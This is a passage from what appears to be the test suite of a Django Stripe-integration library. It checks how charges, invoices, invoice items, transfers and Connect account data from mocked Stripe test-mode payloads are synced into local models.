},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
self.assertEquals(charge.description, "This was a charge for awesome.")
def test_sync_charge_from_stripe_data_amount_refunded(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 10000,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": None,
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
self.assertEquals(charge.amount_refunded, decimal.Decimal("100"))
def test_sync_charge_from_stripe_data_refunded(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": None,
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": True,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
self.assertEquals(charge.refunded, True)
    def test_sync_charge_from_stripe_data_failed(self):
        """A failed, customer-less charge still syncs; outcome JSON is preserved."""
        data = {
            "id": "ch_xxxxxxxxxxxxxxxxxxxxxxxx",
            "object": "charge",
            "amount": 200,
            "amount_refunded": 0,
            "application": None,
            "application_fee": None,
            "balance_transaction": None,
            "captured": False,
            "created": 1488208611,
            "currency": "usd",
            "customer": None,
            "description": None,
            "destination": None,
            "dispute": None,
            "failure_code": "card_declined",
            "failure_message": "Your card was declined.",
            "fraud_details": {},
            "invoice": None,
            "livemode": False,
            "metadata": {},
            "on_behalf_of": None,
            "order": None,
            "outcome": {
                "network_status": "declined_by_network",
                "reason": "generic_decline",
                "risk_level": "normal",
                "seller_message": "The bank did not return any further details with this decline.",
                "type": "issuer_declined"
            },
            "paid": False,
            "receipt_email": None,
            "receipt_number": None,
            "refunded": False,
            "refunds": {
                "object": "list",
                "data": [],
                "has_more": False,
                "total_count": 0,
                "url": "/v1/charges/ch_xxxxxxxxxxxxxxxxxxxxxxxx/refunds"
            },
            "review": None,
            "shipping": None,
            "source": {
                "id": "card_xxxxxxxxxxxxxxxxxxxxxxxx",
                "object": "card",
                "address_city": None,
                "address_country": None,
                "address_line1": None,
                "address_line1_check": None,
                "address_line2": None,
                "address_state": None,
                "address_zip": "424",
                "address_zip_check": "pass",
                "brand": "Visa",
                "country": "US",
                "customer": None,
                "cvc_check": "pass",
                "dynamic_last4": None,
                "exp_month": 4,
                "exp_year": 2024,
                "fingerprint": "xxxxxxxxxxxxxxxx",
                "funding": "credit",
                "last4": "0341",
                "metadata": {},
                "name": "example@example.com",
                "tokenization_method": None
            },
            "source_transfer": None,
            "statement_descriptor": None,
            "status": "failed",
            "transfer_group": None
        }
        charges.sync_charge_from_stripe_data(data)
        # "customer" is None in the payload, so the lookup is by stripe_id only.
        charge = Charge.objects.get(stripe_id=data["id"])
        self.assertEqual(charge.amount, decimal.Decimal("2"))
        self.assertEqual(charge.customer, None)
        # The outcome dict is stored verbatim and remains key-addressable.
        self.assertEqual(charge.outcome["risk_level"], "normal")
@patch("stripe.Subscription.retrieve")
def test_retrieve_stripe_subscription(self, RetrieveMock):
RetrieveMock.return_value = stripe.Subscription(
customer="cus_xxxxxxxxxxxxxxx"
)
value = subscriptions.retrieve(self.customer, "sub id")
self.assertEquals(value, RetrieveMock.return_value)
def test_retrieve_stripe_subscription_no_sub_id(self):
value = subscriptions.retrieve(self.customer, None)
self.assertIsNone(value)
@patch("stripe.Subscription.retrieve")
def test_retrieve_stripe_subscription_diff_customer(self, RetrieveMock):
class Subscription:
customer = "cus_xxxxxxxxxxxxZZZ"
RetrieveMock.return_value = Subscription()
value = subscriptions.retrieve(self.customer, "sub_id")
self.assertIsNone(value)
@patch("stripe.Subscription.retrieve")
def test_retrieve_stripe_subscription_missing_subscription(self, RetrieveMock):
RetrieveMock.return_value = None
value = subscriptions.retrieve(self.customer, "sub id")
self.assertIsNone(value)
@patch("stripe.Subscription.retrieve")
def test_retrieve_stripe_subscription_invalid_request(self, RetrieveMock):
def bad_request(*args, **kwargs):
raise stripe.error.InvalidRequestError("Bad", "error")
RetrieveMock.side_effect = bad_request
with self.assertRaises(stripe.error.InvalidRequestError):
subscriptions.retrieve(self.customer, "sub id")
def test_sync_invoice_items(self):
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now(),
subscription=subscription
)
items = [{
"id": subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}]
invoices.sync_invoice_items(invoice, items)
self.assertTrue(invoice.items.all().count(), 1)
def test_sync_invoice_items_no_plan(self):
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now(),
subscription=subscription
)
items = [{
"id": subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}]
invoices.sync_invoice_items(invoice, items)
self.assertTrue(invoice.items.all().count(), 1)
self.assertEquals(invoice.items.all()[0].plan, plan)
def test_sync_invoice_items_type_not_subscription(self):
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now()
)
items = [{
"id": "ii_23lkj2lkj",
"object": "line_item",
"amount": 2000,
"currency": "usd",
"description": "Something random",
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "line_item"
}]
invoices.sync_invoice_items(invoice, items)
self.assertTrue(invoice.items.all().count(), 1)
self.assertEquals(invoice.items.all()[0].description, "Something random")
self.assertEquals(invoice.items.all()[0].amount, decimal.Decimal("20"))
@patch("pinax.stripe.actions.subscriptions.retrieve")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_sync_invoice_items_different_stripe_id_than_invoice(self, SyncMock, RetrieveSubscriptionMock): # two subscriptions on invoice?
Plan.objects.create(stripe_id="simple", interval="month", interval_count=1, amount=decimal.Decimal("9.99"))
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now(),
subscription=subscription
)
SyncMock.return_value = subscription
items = [{
"id": subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}, {
"id": "sub_7Q4BX0HMfqTpN9",
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "simple",
"object": "plan",
"amount": 999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Simple Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}]
invoices.sync_invoice_items(invoice, items)
self.assertTrue(invoice.items.all().count(), 2)
@patch("pinax.stripe.actions.subscriptions.retrieve")
def test_sync_invoice_items_updating(self, RetrieveSubscriptionMock):
RetrieveSubscriptionMock.return_value = None
Plan.objects.create(stripe_id="simple", interval="month", interval_count=1, amount=decimal.Decimal("9.99"))
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now(),
subscription=subscription
)
items = [{
"id": subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}, {
"id": "sub_7Q4BX0HMfqTpN9",
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "simple",
"object": "plan",
"amount": 999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Simple Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}]
invoices.sync_invoice_items(invoice, items)
self.assertEquals(invoice.items.count(), 2)
items[1].update({"description": "This is your second subscription"})
invoices.sync_invoice_items(invoice, items)
self.assertEquals(invoice.items.count(), 2)
self.assertEquals(invoice.items.get(stripe_id="sub_7Q4BX0HMfqTpN9").description, "This is your second subscription")
class InvoiceSyncsTests(TestCase):
    """Tests for invoices.sync_invoice_from_stripe_data and its charge/receipt handling."""

    def setUp(self):
        self.User = get_user_model()
        self.user = self.User.objects.create_user(
            username="patrick",
            email="paltman@example.com"
        )
        self.customer = Customer.objects.create(
            user=self.user,
            stripe_id="cus_xxxxxxxxxxxxxxx"
        )
        plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
        self.subscription = Subscription.objects.create(
            stripe_id="sub_7Q4BX0HMfqTpN8",
            customer=self.customer,
            plan=plan,
            quantity=1,
            status="active",
            start=timezone.now()
        )
        # A representative Stripe invoice payload tied to the subscription above.
        self.invoice_data = {
            "id": "in_17B6e8I10iPhvocMGtYd4hDD",
            "object": "invoice",
            "amount_due": 1999,
            "application_fee": None,
            "attempt_count": 0,
            "attempted": False,
            "charge": None,
            "closed": False,
            "currency": "usd",
            "customer": self.customer.stripe_id,
            "date": 1448470892,
            "description": None,
            "discount": None,
            "ending_balance": None,
            "forgiven": False,
            "lines": {
                "data": [{
                    "id": self.subscription.stripe_id,
                    "object": "line_item",
                    "amount": 0,
                    "currency": "usd",
                    "description": None,
                    "discountable": True,
                    "livemode": True,
                    "metadata": {
                    },
                    "period": {
                        "start": 1448499344,
                        "end": 1448758544
                    },
                    "plan": {
                        "id": "pro2",
                        "object": "plan",
                        "amount": 1999,
                        "created": 1448121054,
                        "currency": "usd",
                        "interval": "month",
                        "interval_count": 1,
                        "livemode": False,
                        "metadata": {
                        },
                        "name": "The Pro Plan",
                        "statement_descriptor": "ALTMAN",
                        "trial_period_days": 3
                    },
                    "proration": False,
                    "quantity": 1,
                    "subscription": None,
                    "type": "subscription"
                }],
                "total_count": 1,
                "object": "list",
                "url": "/v1/invoices/in_17B6e8I10iPhvocMGtYd4hDD/lines"
            },
            "livemode": False,
            "metadata": {
            },
            "next_payment_attempt": 1448474492,
            "paid": False,
            "period_end": 1448470739,
            "period_start": 1448211539,
            "receipt_number": None,
            "starting_balance": 0,
            "statement_descriptor": None,
            "subscription": self.subscription.stripe_id,
            "subtotal": 1999,
            "tax": None,
            "tax_percent": None,
            "total": 1999,
            "webhooks_delivered_at": None
        }
        self.account = Account.objects.create(stripe_id="acct_X")

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("stripe.Charge.retrieve")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("pinax.stripe.actions.invoices.sync_invoice_items")
    @patch("pinax.stripe.actions.subscriptions.retrieve")
    def test_sync_invoice_from_stripe_data(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncChargeMock, ChargeFetchMock, SyncSubscriptionMock, SendReceiptMock):
        """An invoice with a charge fetches/syncs the charge and sends a receipt."""
        charge = Charge.objects.create(
            stripe_id="ch_XXXXXX",
            customer=self.customer,
            source="card_01",
            amount=decimal.Decimal("10.00"),
            currency="usd",
            paid=True,
            refunded=False,
            disputed=False
        )
        self.invoice_data["charge"] = charge.stripe_id
        SyncChargeMock.return_value = charge
        SyncSubscriptionMock.return_value = self.subscription
        invoices.sync_invoice_from_stripe_data(self.invoice_data)
        self.assertTrue(SyncInvoiceItemsMock.called)
        # assertEquals is a deprecated alias; use assertEqual throughout.
        self.assertEqual(Invoice.objects.filter(customer=self.customer).count(), 1)
        self.assertTrue(ChargeFetchMock.called)
        self.assertTrue(SyncChargeMock.called)
        self.assertTrue(SendReceiptMock.called)

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("stripe.Charge.retrieve")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("pinax.stripe.actions.invoices.sync_invoice_items")
    @patch("pinax.stripe.actions.subscriptions.retrieve")
    def test_sync_invoice_from_stripe_data_no_send_receipt(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncChargeMock, ChargeFetchMock, SyncSubscriptionMock, SendReceiptMock):
        """send_receipt=False suppresses the receipt hook while still syncing."""
        charge = Charge.objects.create(
            stripe_id="ch_XXXXXX",
            customer=self.customer,
            source="card_01",
            amount=decimal.Decimal("10.00"),
            currency="usd",
            paid=True,
            refunded=False,
            disputed=False
        )
        self.invoice_data["charge"] = charge.stripe_id
        SyncChargeMock.return_value = charge
        SyncSubscriptionMock.return_value = self.subscription
        invoices.sync_invoice_from_stripe_data(self.invoice_data, send_receipt=False)
        self.assertTrue(SyncInvoiceItemsMock.called)
        self.assertEqual(Invoice.objects.filter(customer=self.customer).count(), 1)
        self.assertTrue(ChargeFetchMock.called)
        self.assertTrue(SyncChargeMock.called)
        self.assertFalse(SendReceiptMock.called)

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("stripe.Charge.retrieve")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("pinax.stripe.actions.invoices.sync_invoice_items")
    @patch("pinax.stripe.actions.subscriptions.retrieve")
    def test_sync_invoice_from_stripe_data_connect(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncChargeMock, ChargeFetchMock, SyncSubscriptionMock, SendReceiptMock):
        """A Connect customer's charge fetch passes stripe_account and expands the balance txn."""
        self.invoice_data["charge"] = "ch_XXXXXX"
        self.customer.stripe_account = self.account
        self.customer.save()
        charge = Charge.objects.create(
            stripe_id="ch_XXXXXX",
            customer=self.customer,
            source="card_01",
            amount=decimal.Decimal("10.00"),
            currency="usd",
            paid=True,
            refunded=False,
            disputed=False
        )
        SyncChargeMock.return_value = charge
        SyncSubscriptionMock.return_value = self.subscription
        invoices.sync_invoice_from_stripe_data(self.invoice_data)
        self.assertTrue(SyncInvoiceItemsMock.called)
        self.assertEqual(Invoice.objects.filter(customer=self.customer).count(), 1)
        self.assertTrue(ChargeFetchMock.called)
        args, kwargs = ChargeFetchMock.call_args
        self.assertEqual(args, ("ch_XXXXXX",))
        self.assertEqual(kwargs, {"stripe_account": "acct_X",
                                  "expand": ["balance_transaction"]})
        self.assertTrue(SyncChargeMock.called)
        self.assertTrue(SendReceiptMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("pinax.stripe.actions.invoices.sync_invoice_items")
    @patch("pinax.stripe.actions.subscriptions.retrieve")
    def test_sync_invoice_from_stripe_data_no_charge(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncSubscriptionMock):
        """An invoice without a charge still syncs its items and creates the invoice."""
        SyncSubscriptionMock.return_value = self.subscription
        self.invoice_data["charge"] = None
        invoices.sync_invoice_from_stripe_data(self.invoice_data)
        self.assertTrue(SyncInvoiceItemsMock.called)
        self.assertEqual(Invoice.objects.filter(customer=self.customer).count(), 1)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("pinax.stripe.actions.invoices.sync_invoice_items")
    @patch("pinax.stripe.actions.subscriptions.retrieve")
    def test_sync_invoice_from_stripe_data_no_subscription(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncSubscriptionMock):
        """An invoice with no subscription yields an invoice whose subscription is None."""
        SyncSubscriptionMock.return_value = None
        data = {
            "id": "in_17B6e8I10iPhvocMGtYd4hDD",
            "object": "invoice",
            "amount_due": 1999,
            "application_fee": None,
            "attempt_count": 0,
            "attempted": False,
            "charge": None,
            "closed": False,
            "currency": "usd",
            "customer": self.customer.stripe_id,
            "date": 1448470892,
            "description": None,
            "discount": None,
            "ending_balance": None,
            "forgiven": False,
            "lines": {
                "data": [{
                    "id": "ii_2342342",
                    "object": "line_item",
                    "amount": 2000,
                    "currency": "usd",
                    "description": None,
                    "discountable": True,
                    "livemode": True,
                    "metadata": {
                    },
                    "period": {
                        "start": 1448499344,
                        "end": 1448758544
                    },
                    "proration": False,
                    "quantity": 1,
                    "subscription": None,
                    "type": "line_item"
                }],
                "total_count": 1,
                "object": "list",
                "url": "/v1/invoices/in_17B6e8I10iPhvocMGtYd4hDD/lines"
            },
            "livemode": False,
            "metadata": {
            },
            "next_payment_attempt": 1448474492,
            "paid": False,
            "period_end": 1448470739,
            "period_start": 1448211539,
            "receipt_number": None,
            "starting_balance": 0,
            "statement_descriptor": None,
            "subscription": "",
            "subtotal": 2000,
            "tax": None,
            "tax_percent": None,
            "total": 2000,
            "webhooks_delivered_at": None
        }
        invoices.sync_invoice_from_stripe_data(data)
        self.assertTrue(SyncInvoiceItemsMock.called)
        self.assertEqual(Invoice.objects.filter(customer=self.customer).count(), 1)
        self.assertIsNone(Invoice.objects.filter(customer=self.customer)[0].subscription)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("pinax.stripe.actions.invoices.sync_invoice_items")
    @patch("pinax.stripe.actions.subscriptions.retrieve")
    def test_sync_invoice_from_stripe_data_updated(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncSubscriptionMock):
        """Re-syncing an existing invoice updates it in place instead of duplicating."""
        SyncSubscriptionMock.return_value = self.subscription
        data = self.invoice_data
        invoices.sync_invoice_from_stripe_data(data)
        self.assertTrue(SyncInvoiceItemsMock.called)
        self.assertEqual(Invoice.objects.filter(customer=self.customer).count(), 1)
        data.update({"paid": True})
        invoices.sync_invoice_from_stripe_data(data)
        self.assertEqual(Invoice.objects.filter(customer=self.customer).count(), 1)
        self.assertEqual(Invoice.objects.filter(customer=self.customer)[0].paid, True)
class TransfersTests(TestCase):
    """Tests for the transfers actions: sync, during, update_status and create."""

    def setUp(self):
        # A representative Stripe transfer payload used across the tests.
        self.data = {
            "id": "tr_17BE31I10iPhvocMDwiBi4Pk",
            "object": "transfer",
            "amount": 1100,
            "amount_reversed": 0,
            "application_fee": None,
            "balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
            "created": 1448499343,
            "currency": "usd",
            "date": 1448499343,
            "description": "Transfer to test@example.com",
            "destination": "ba_17BE31I10iPhvocMOUp6E9If",
            "failure_code": None,
            "failure_message": None,
            "livemode": False,
            "metadata": {
            },
            "recipient": "rp_17BE31I10iPhvocM14ZKPFfR",
            "reversals": {
                "object": "list",
                "data": [
                ],
                "has_more": False,
                "total_count": 0,
                "url": "/v1/transfers/tr_17BE31I10iPhvocMDwiBi4Pk/reversals"
            },
            "reversed": False,
            "source_transaction": None,
            "statement_descriptor": None,
            "status": "in_transit",
            "type": "bank_account"
        }
        self.event = Event.objects.create(
            stripe_id="evt_001",
            kind="transfer.paid",
            webhook_message={"data": {"object": self.data}},
            validated_message={"data": {"object": self.data}},
            valid=True,
            processed=False
        )

    def test_sync_transfer(self):
        """Syncing creates one local Transfer tied to the originating event."""
        transfers.sync_transfer(self.data, self.event)
        qs = Transfer.objects.filter(stripe_id=self.event.message["data"]["object"]["id"])
        # assertEquals is a deprecated alias; use assertEqual throughout.
        self.assertEqual(qs.count(), 1)
        self.assertEqual(qs[0].event, self.event)

    def test_sync_transfer_update(self):
        """Syncing the same transfer again updates its status instead of duplicating."""
        transfers.sync_transfer(self.data, self.event)
        qs = Transfer.objects.filter(stripe_id=self.event.message["data"]["object"]["id"])
        self.assertEqual(qs.count(), 1)
        self.assertEqual(qs[0].event, self.event)
        self.event.validated_message["data"]["object"]["status"] = "paid"
        transfers.sync_transfer(self.event.message["data"]["object"], self.event)
        qs = Transfer.objects.filter(stripe_id=self.event.message["data"]["object"]["id"])
        self.assertEqual(qs[0].status, "paid")

    def test_transfer_during(self):
        """during(year, month) returns transfers dated within that month."""
        Transfer.objects.create(
            stripe_id="tr_002",
            event=Event.objects.create(kind="transfer.created", webhook_message={}),
            amount=decimal.Decimal("100"),
            status="pending",
            date=timezone.now().replace(year=2015, month=1)
        )
        qs = transfers.during(2015, 1)
        self.assertEqual(qs.count(), 1)

    @patch("stripe.Transfer.retrieve")
    def test_transfer_update_status(self, RetrieveMock):
        """update_status copies the current status from Stripe onto the local row."""
        RetrieveMock().status = "complete"
        transfer = Transfer.objects.create(
            stripe_id="tr_001",
            event=Event.objects.create(kind="transfer.created", webhook_message={}),
            amount=decimal.Decimal("100"),
            status="pending",
            date=timezone.now().replace(year=2015, month=1)
        )
        transfers.update_status(transfer)
        self.assertEqual(transfer.status, "complete")

    @patch("stripe.Transfer.create")
    def test_transfer_create(self, CreateMock):
        """create() calls through to stripe.Transfer.create."""
        CreateMock.return_value = self.data
        transfers.create(decimal.Decimal("100"), "usd", None, None)
        self.assertTrue(CreateMock.called)

    @patch("stripe.Transfer.create")
    def test_transfer_create_with_transfer_group(self, CreateMock):
        """transfer_group is forwarded to the Stripe API call."""
        CreateMock.return_value = self.data
        transfers.create(decimal.Decimal("100"), "usd", None, None, transfer_group="foo")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["transfer_group"], "foo")

    @patch("stripe.Transfer.create")
    def test_transfer_create_with_stripe_account(self, CreateMock):
        """stripe_account is forwarded to the Stripe API call."""
        CreateMock.return_value = self.data
        transfers.create(decimal.Decimal("100"), "usd", None, None, stripe_account="foo")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["stripe_account"], "foo")
class AccountsSyncTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(AccountsSyncTestCase, cls).setUpClass()
cls.custom_account_data = json.loads(
"""{
"type":"custom",
"tos_acceptance":{
"date":1490903452,
"ip":"123.107.1.28",
"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
},
"business_logo":null,
"email":"operations@someurl.com",
"timezone":"Etc/UTC",
"statement_descriptor":"SOME COMP",
"default_currency":"cad",
"payout_schedule":{
"delay_days":3,
"interval":"manual"
},
"display_name":"Some Company",
"payout_statement_descriptor": "For reals",
"id":"acct_1A39IGDwqdd5icDO",
"payouts_enabled":true,
"external_accounts":{
"has_more":false,
"total_count":1,
"object":"list",
"data":[
{
"routing_number":"11000-000",
"bank_name":"SOME CREDIT UNION",
"account":"acct_1A39IGDwqdd5icDO",
"object":"bank_account",
"currency":"cad",
"country":"CA",
"account_holder_name":"Luke Burden",
"last4":"6789",
"status":"new",
"fingerprint":"bZJnuqqS4qIX0SX0",
"account_holder_type":"individual",
"default_for_currency":true,
"id":"ba_1A39IGDwqdd5icDOn9VrFXlQ",
"metadata":{}
}
],
"url":"/v1/accounts/acct_1A39IGDwqdd5icDO/external_accounts"
},
"support_email":"support@someurl.com",
"metadata":{
"user_id":"9428"
},
"support_phone":"7788188181",
"business_name":"Woop Woop",
"object":"account",
"charges_enabled":true,
"business_name":"Woop Woop",
"debit_negative_balances":false,
"country":"CA",
"decline_charge_on":{
"avs_failure":true,
"cvc_failure":true
},
"product_description":"Monkey Magic",
"legal_entity":{
"personal_id_number_provided":false,
"first_name":"Luke",
"last_name":"Baaard",
"dob":{
"month":2,
"day":3,
"year":1999
},
"personal_address":{
"city":null,
"country":"CA",
"line2":null,
"line1":null,
"state":null,
"postal_code":null
},
"business_tax_id_provided":false,
"verification":{
"status":"unverified",
"details_code":"failed_keyed_identity",
"document":null,
"details":"Provided identity information could not be verified"
},
"address":{
"city":"Vancouver",
"country":"CA",
"line2":null,
"line1":"14 Alberta St",
"state":"BC",
"postal_code":"V5Y4Z2"
},
"business_name":null,
"type":"individual"
},
"details_submitted":true,
"verification":{
"due_by":null,
"fields_needed":[
"legal_entity.personal_id_number"
],
"disabled_reason":null
}
}""")
cls.custom_account_data_no_dob_no_verification_no_tosacceptance = json.loads(
"""{
"type":"custom",
